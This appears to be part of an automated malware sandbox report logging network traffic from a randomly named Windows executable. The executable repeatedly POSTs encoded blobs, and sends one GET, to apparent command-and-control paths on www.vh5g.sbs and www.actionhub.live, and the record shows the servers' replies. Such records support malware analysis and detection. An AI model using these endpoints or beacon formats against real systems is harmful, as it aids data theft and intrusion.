                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.vh5g.sbs
                                                                              Origin: http://www.vh5g.sbs
                                                                              Referer: http://www.vh5g.sbs/54nj/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 75 53 31 63 38 74 55 50 34 30 66 75 35 54 39 79 64 36 70 42 7a 62 42 6f 67 45 79 59 54 51 32 63 4b 68 79 69 6e 35 67 75 5a 4a 56 7a 36 68 46 34 48 41 76 37 4c 76 34 74 32 4e 74 63 64 64 4a 31 73 41 2b 39 69 59 42 6c 44 76 50 68 6e 4f 64 56 4c 73 39 38 76 73 49 74 42 33 5a 66 5a 2f 6d 45 41 6d 57 6c 2f 67 6a 58 6c 72 64 6d 64 38 6b 36 4b 78 30 66 6f 32 38 79 45 57 72 6f 43 30 6f 69 43 65 63 44 74 48 44 6e 73 31 38 77 34 55 51 71 41 2f 42 62 65 56 52 49 61 32 43 77 78 68 55 55 4e 74 4e 70 33 54 63 6d 46 44 72 4c 73 67 4f 2b 4c 53 6a 2f 37 72 38 38 51 47 5a 42 39 55 47 61 57 6d 55 54 37 51 55 3d
                                                                              Data Ascii: t0A=uS1c8tUP40fu5T9yd6pBzbBogEyYTQ2cKhyin5guZJVz6hF4HAv7Lv4t2NtcddJ1sA+9iYBlDvPhnOdVLs98vsItB3ZfZ/mEAmWl/gjXlrdmd8k6Kx0fo28yEWroC0oiCecDtHDns18w4UQqA/BbeVRIa2CwxhUUNtNp3TcmFDrLsgO+LSj/7r88QGZB9UGaWmUT7QU=
                                                                              Jan 14, 2025 12:01:58.115289927 CET1236INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 14 Jan 2025 11:01:57 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: http://www.vh5g.sbs/
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                              Permissions-Policy: interest-cohort=()
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3W8hyW0ibEgXhbJkcLzv5sybR8YfaWZvQrmYdUfDqX0HJSicg3q6CtsGLfbbFhU81Ayn6nYrsIi9Iy7lrTYrR%2BkUrdptMDw9yKqDK%2F4qfY3uR1j86%2BtDNi8R727an5Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901d218c0887c413-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1415&min_rtt=1415&rtt_var=707&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=644&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74
                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></ht
                                                                              Jan 14, 2025 12:01:58.115307093 CET12INData Raw: 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: ml>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.549472188.114.97.3802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:01:59.895302057 CET664OUTPOST /54nj/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.vh5g.sbs
                                                                              Origin: http://www.vh5g.sbs
                                                                              Referer: http://www.vh5g.sbs/54nj/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 75 53 31 63 38 74 55 50 34 30 66 75 36 7a 4e 79 47 5a 42 42 6d 4c 42 6e 6a 45 79 59 42 51 32 59 4b 67 4f 69 6e 34 56 7a 5a 36 68 7a 37 42 56 34 47 42 76 37 49 76 34 74 39 74 74 6a 46 39 4a 45 73 41 79 31 69 5a 74 6c 44 75 72 68 6e 4c 35 56 4b 62 42 6a 2b 73 49 72 49 58 5a 42 58 66 6d 45 41 6d 57 6c 2f 67 32 41 6c 72 46 6d 64 4d 30 36 4b 54 51 41 69 57 38 31 51 47 72 6f 47 30 6f 6d 43 65 63 39 74 47 50 4e 73 32 45 77 34 55 67 71 42 72 74 59 4c 6c 52 30 51 57 44 53 32 44 4a 4b 56 64 35 68 7a 53 6c 48 44 42 76 6b 67 32 2f 55 52 77 72 58 6f 4c 51 45 41 56 52 32 73 6b 6e 7a 4d 46 45 6a 6c 48 42 49 2b 66 77 32 4a 62 78 33 30 7a 74 39 6b 70 6b 63 68 6f 79 55
                                                                              Data Ascii: t0A=uS1c8tUP40fu6zNyGZBBmLBnjEyYBQ2YKgOin4VzZ6hz7BV4GBv7Iv4t9ttjF9JEsAy1iZtlDurhnL5VKbBj+sIrIXZBXfmEAmWl/g2AlrFmdM06KTQAiW81QGroG0omCec9tGPNs2Ew4UgqBrtYLlR0QWDS2DJKVd5hzSlHDBvkg2/URwrXoLQEAVR2sknzMFEjlHBI+fw2Jbx30zt9kpkchoyU
                                                                              Jan 14, 2025 12:02:00.506424904 CET1236INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 14 Jan 2025 11:02:00 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: http://www.vh5g.sbs/
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                              Permissions-Policy: interest-cohort=()
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PeZBUJspwZlGAHAI7nwl8hsOyr%2BJh%2FFeVsPYMrLR5X5I92f064zi514Ojza1DdF0yVd60EZRUl0XhVwQXujgmhU3DeM%2Fp3nf6X2vqHi1KqZb33hFy0ioCYPynNcB1H4%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901d219bfe794259-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=664&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74
                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></ht
                                                                              Jan 14, 2025 12:02:00.506460905 CET12INData Raw: 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: ml>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.549473188.114.97.3802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:02.903641939 CET1681OUTPOST /54nj/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.vh5g.sbs
                                                                              Origin: http://www.vh5g.sbs
                                                                              Referer: http://www.vh5g.sbs/54nj/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 75 53 31 63 38 74 55 50 34 30 66 75 36 7a 4e 79 47 5a 42 42 6d 4c 42 6e 6a 45 79 59 42 51 32 59 4b 67 4f 69 6e 34 56 7a 5a 36 35 7a 37 79 74 34 48 69 58 37 47 50 34 74 77 4e 74 59 46 39 4a 64 73 41 36 78 69 5a 51 51 44 74 44 68 6b 74 6c 56 65 36 42 6a 6e 38 49 72 4b 58 5a 63 5a 2f 6e 4f 41 6d 47 68 2f 67 6d 41 6c 72 46 6d 64 4b 59 36 4e 42 30 41 6b 57 38 79 45 57 72 73 43 30 6f 65 43 65 55 74 74 47 4c 33 74 48 6b 77 34 30 77 71 47 59 56 59 58 31 52 4d 58 57 44 30 32 44 46 72 56 64 56 48 7a 53 52 68 44 44 2f 6b 6a 54 57 4a 42 77 2f 72 35 49 30 32 47 48 38 54 77 44 72 55 44 32 41 47 69 57 31 73 32 4f 67 72 4d 63 42 33 38 6a 59 70 79 4d 78 4f 6b 38 48 50 4e 32 79 59 65 33 61 36 4c 4f 53 67 75 52 4e 63 71 33 50 2b 34 48 5a 58 67 61 50 75 58 70 45 2b 2b 68 63 4e 45 2b 4d 32 63 63 64 45 31 46 77 39 76 53 43 55 6a 47 61 63 56 58 4b 62 49 76 30 73 56 68 35 31 6a 55 64 4e 46 4a 35 70 30 39 4b 58 4e 74 64 44 69 68 67 64 6c 34 55 70 41 6a 4f 59 74 73 65 43 6b 69 67 4e 51 2f 7a 2f 41 58 41 75 37 4b [TRUNCATED]
                                                                              Data Ascii: t0A=uS1c8tUP40fu6zNyGZBBmLBnjEyYBQ2YKgOin4VzZ65z7yt4HiX7GP4twNtYF9JdsA6xiZQQDtDhktlVe6Bjn8IrKXZcZ/nOAmGh/gmAlrFmdKY6NB0AkW8yEWrsC0oeCeUttGL3tHkw40wqGYVYX1RMXWD02DFrVdVHzSRhDD/kjTWJBw/r5I02GH8TwDrUD2AGiW1s2OgrMcB38jYpyMxOk8HPN2yYe3a6LOSguRNcq3P+4HZXgaPuXpE++hcNE+M2ccdE1Fw9vSCUjGacVXKbIv0sVh51jUdNFJ5p09KXNtdDihgdl4UpAjOYtseCkigNQ/z/AXAu7K5mMaFU+fXbBFRxw9tcOIXpr60GgQNec15M+zJhlb6mRY6nWX18Mbah/1guHa0V7dWPy0dSQn9rlL/hatJ62xYwEJcSL7RQHU0/kMCzguBq7yCMHiezoxxDmu98IkCaXRu9lqg4BUMHDDQT7UzOTaZ8FjdvcYE+bS1Bh/9d3LHXfFv6WVrk+aR8+Atf7dPfq02otSHDmYv8WpFxBlo5HmAHiGZzGl8EcRSvYeONsF9Ebg1DU6z4RWQ0bVMLIniTQUk0rn5hQwLVy1KxFql5WqqNYOQm+MD8MLKOZK2v+hKNv1hycvNl70IIiuAEu6Jl/Eu28xKCdRC5tDfnyIwQ5HUH9wMxSPDERzQGTwmzMeyXp6dmhB2kwFXgwRcFupt8mWJupsTIh2rEEVVfUTgOuCN5iY0x9ZeII12Zvv8yNPVk02tJNCkpTPh9r75VqJkh0OhtL7R/ZjRQvd1QQZfLQhXvdNiIEtGqVlEGe0yiYF3+IcdeaNSX04kDwaBUy6iXgoL8eOEdbGJpMfsZpCYzTamV+yO9cuLT3PMyeQnWmNQ3EsRToj2hk8iYCirejUyXndSZWZe2roUa9WP33KZDHqQ190mEyWJz4iKeWJMzeoHDdv4QYJXggCgdgJ4ToyO2nT6eCLV9XeT5wREo2nqsFw2QoaoZyTZUEKYe [TRUNCATED]
                                                                              Jan 14, 2025 12:02:03.728939056 CET1236INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 14 Jan 2025 11:02:03 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: http://www.vh5g.sbs/
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                              Permissions-Policy: interest-cohort=()
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1B9PDEit9yHpOpqE0JOS8Qo6DOYZsLrl64cX60D7KZW7PQTKNgL2NzagnOG8fHUMaJFkJRiJk2KmImCfnXK1bKHCIm1ddEjJp3RQQmyBXo4JZkEhQOgYOqg6Nf5n%2BI%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901d21afda7f7d00-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=1010&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1681&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c
                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html
                                                                              Jan 14, 2025 12:02:03.728956938 CET10INData Raw: 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: >0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.549474188.114.97.3802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:05.439086914 CET390OUTGET /54nj/?t0A=jQd8/d8A1xfb/FB7GpkT6bk0jTG6GinOCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JjsIyEnVbQOGzSnW49Az79/F0I7s7DjUUiEBnQG3SAllRdw==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.vh5g.sbs
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:02:06.068598986 CET1236INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 14 Jan 2025 11:02:06 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: http://www.vh5g.sbs/
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                              Permissions-Policy: interest-cohort=()
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eMH8Da8hw5aDyVTqs4UZEfCl2QDNEZZxa3rLiFEIgj4A5dTldHfprynAJczqzKBZm0GVOXFyeus%2BUq2kts0chJMWpRDP2gcV04NGooDiHD6gj9dLVKOSXKW2XKW%2Faik%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901d21be7d40c47c-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1540&rtt_var=770&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c
                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html
                                                                              Jan 14, 2025 12:02:06.068629026 CET10INData Raw: 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: >0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.54947567.223.117.189802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:19.462048054 CET662OUTPOST /gq43/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.actionhub.live
                                                                              Origin: http://www.actionhub.live
                                                                              Referer: http://www.actionhub.live/gq43/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 73 39 31 48 6e 31 44 69 42 2f 78 46 64 30 54 4e 46 52 76 47 4c 49 71 45 49 6d 43 53 65 59 6d 44 38 6b 76 43 6f 55 51 2f 34 2f 4b 64 4d 52 6b 6f 34 6e 4d 2f 48 6f 53 6e 73 4d 47 6d 33 68 67 46 6c 4c 35 77 77 55 69 6d 50 46 47 38 76 66 49 75 58 4e 4a 2b 43 65 6c 4f 68 6a 4d 4d 6f 6b 7a 58 4e 42 76 34 66 44 6a 31 76 31 36 41 35 4e 73 6e 5a 77 36 52 4c 4b 67 70 2b 31 37 70 66 31 44 67 6d 6b 42 30 58 39 2b 31 6b 6a 31 6a 68 31 56 4d 63 34 37 32 66 63 48 58 36 45 45 63 56 42 6a 66 79 38 5a 45 36 38 68 61 64 2f 47 44 55 42 7a 58 4d 32 5a 55 75 64 74 6d 5a 76 49 70 55 64 78 4f 39 51 37 2b 51 35 59 3d
                                                                              Data Ascii: t0A=s91Hn1DiB/xFd0TNFRvGLIqEImCSeYmD8kvCoUQ/4/KdMRko4nM/HoSnsMGm3hgFlL5wwUimPFG8vfIuXNJ+CelOhjMMokzXNBv4fDj1v16A5NsnZw6RLKgp+17pf1DgmkB0X9+1kj1jh1VMc472fcHX6EEcVBjfy8ZE68had/GDUBzXM2ZUudtmZvIpUdxO9Q7+Q5Y=
                                                                              Jan 14, 2025 12:02:20.035646915 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 11:02:19 GMT
                                                                              Server: Apache
                                                                              Content-Length: 32106
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                              Jan 14, 2025 12:02:20.035665035 CET224INData Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                                              Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/o
                                                                              Jan 14, 2025 12:02:20.035684109 CET1236INData Raw: 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f
                                                                              Data Ascii: wl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="assets/vendor/timeline/timeline.css"> ... FABLES CUSTOM C
                                                                              Jan 14, 2025 12:02:20.035696983 CET1236INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62
                                                                              Data Ascii: div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color fables-top-header-signin"> <div class="container">
                                                                              Jan 14, 2025 12:02:20.035707951 CET1236INData Raw: 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                                              Data Ascii: > </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables-third-text-color font-13"><span class="fables-iconphone"></sp
                                                                              Jan 14, 2025 12:02:20.035721064 CET672INData Raw: 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67
                                                                              Data Ascii: vDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span> </button>
                                                                              Jan 14, 2025 12:02:20.035768986 CET1236INData Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                                              Jan 14, 2025 12:02:20.035780907 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
